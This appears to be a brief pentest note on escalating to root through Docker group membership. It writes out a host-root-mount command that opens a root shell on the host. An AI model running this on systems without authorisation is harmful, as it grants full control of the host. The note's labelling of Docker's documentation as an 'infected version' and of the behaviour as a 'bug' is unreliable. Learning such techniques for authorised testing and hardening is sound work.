Pentest Docker Engine priv escalation
Situation:
- ssh user with docker priv.
- docker installed.
- ubuntu server
usually normal docker usage is :
docker run hello-world This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.
we got the priv
to execute it …
Next :
-
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
- Explanation :
Parameter -v will create volume in docker instance , Parameter -it makes docker in shell mode instead of daemon process.
and result is .
infected version https://docs.docker.com/engine/install/linux-postinstall/
more info about the bug https://gtfobins.github.io/gtfobins/docker/